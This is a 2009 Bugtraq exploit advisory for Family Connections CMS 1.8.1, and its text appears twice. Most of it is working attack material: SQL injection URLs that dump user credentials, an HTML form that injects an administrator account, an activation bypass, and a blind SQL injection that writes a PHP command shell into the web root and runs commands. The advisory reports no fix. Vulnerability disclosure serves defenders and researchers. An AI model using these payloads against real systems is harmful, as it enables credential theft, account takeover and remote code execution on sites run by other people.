Family Connections 1.8.1 Multiple Remote Vulnerabilities
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Family Connections 1.8.1 Multiple Remote Vulnerabilities
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Mon, 30 Mar 2009 19:45:51 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=IG9ODC8R34FbjjsT4qe5Z8NCOk143PmqWMWd9ro1Gew=; b=AAzFAR7q/KCfsIoRe/QzXH4h3MWaaaQT7AJuAxL9+P0nKFs7ZYA42n8XsPF+EKjc9N W94YlF41yRx7ir3ngZh/93H/mY2eNlW0QGWqaDLyGlzm2/GUQgwQS636i6Pb+RDqCSWY PHti36cjmnlU9ChWvrHeYbbWkE6+vE2hdcQr0=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=sv6B0qGm1m5RC/6O5WSUAH86XsBtXFIL1RhP2cVyqdBU3h5GueQWFjNxdL4WyDbbyJ HItCh54bAtSqCYMoYQ7pWykVBPFFTXOp+1z5G0P6G6H4tddoOeZsgVTIjygyTL8gPd7M B6GtX94wjXMm/4Be7Ck/hWE6Cl4+z9WYZwOj0=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com
[+] Bugs: [A] Multiple SQL Injection
[B] Create Admin User
[C] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 25 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = on/off
These bugs allows a registered user to view
username and password of all registered users.
- [B] Create Admin User
[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php
This bug allow a guest to create an account with
administrator privileges.
- [C] Blind SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23
http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users
http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23
- [B] Create Admin User
<html>
<head>
<title>Family Connection 1.8.1 Create Admin User Exploit</title>
</head>
<body>
<p>This exploit creates an user with administrator privileges
using follows information:<br>
Username: root<br>
Password: toor<br>
<form action="http://localhost/fcms/register.php" method="POST">
<input type="hidden" name="username" value="blabla">
<input type="hidden" name="password" value="blabla">
<input type="hidden" name="email" value="blabla@xxxxxxxxxxxxx">
<input type="hidden" name="fname" value="blabla">
<input type="hidden" name="lname" value="blabla">
<input type="hidden" name="year"
value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root',
'root', 'root@xxxxxxxxx', '00-00-00', 'root',
'7b24afc8bc80e548d66c4e7ff72171c5')#'">
<input type="submit" name="submit" value="Exploit">
</form>
</body>
</html>
To activate accounts:
http://www.site.com/path/activate.php?uid=1 or 1=1&code=
[C] Blind SQL Injection
POST /path/lostpw.php HTTP/1.1\r\n"
Host: www.site.com\r\n"
Content-Type: application/x-www-form-urlencoded\r\n"
Content-Length: 193\r\n\r\n"
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]);
echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
INTO OUTFILE '/var/www/htdocs/path/rce.php'#
To execute commands:
http://www.site.com/path/rce.php?cmd=ls
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******
[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com
[+] Bugs: [A] Multiple SQL Injection
[B] Create Admin User
[C] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 25 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = on/off
These bugs allows a registered user to view
username and password of all registered users.
- [B] Create Admin User
[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php
This bug allow a guest to create an account with
administrator privileges.
- [C] Blind SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT
1,2,NULL,username,5,password,email FROM fcms_users%23
http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users
http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23
- [B] Create Admin User
<html>
<head>
<title>Family Connection 1.8.1 Create Admin User Exploit</title>
</head>
<body>
<p>This exploit creates an user with administrator privileges using follows
information:<br>
Username: root<br>
Password: toor<br>
<form action="http://localhost/fcms/register.php" method="POST">
<input type="hidden" name="username" value="blabla">
<input type="hidden" name="password" value="blabla">
<input type="hidden" name="email" value="blabla@xxxxxxxxxxxxx">
<input type="hidden" name="fname" value="blabla">
<input type="hidden" name="lname" value="blabla">
<input type="hidden" name="year"
value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root',
'root@xxxxxxxxx', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'">
<input type="submit" name="submit" value="Exploit">
</form>
</body>
</html>
To activate accounts:
http://www.site.com/path/activate.php?uid=1 or 1=1&code=
[C] Blind SQL Injection
POST /path/lostpw.php HTTP/1.1\r\n"
Host: www.site.com\r\n"
Content-Type: application/x-www-form-urlencoded\r\n"
Content-Length: 193\r\n\r\n"
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo
"</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE
'/var/www/htdocs/path/rce.php'#
To execute commands:
http://www.site.com/path/rce.php?cmd=ls
*************************************************
[+] Fix
No fix.
*************************************************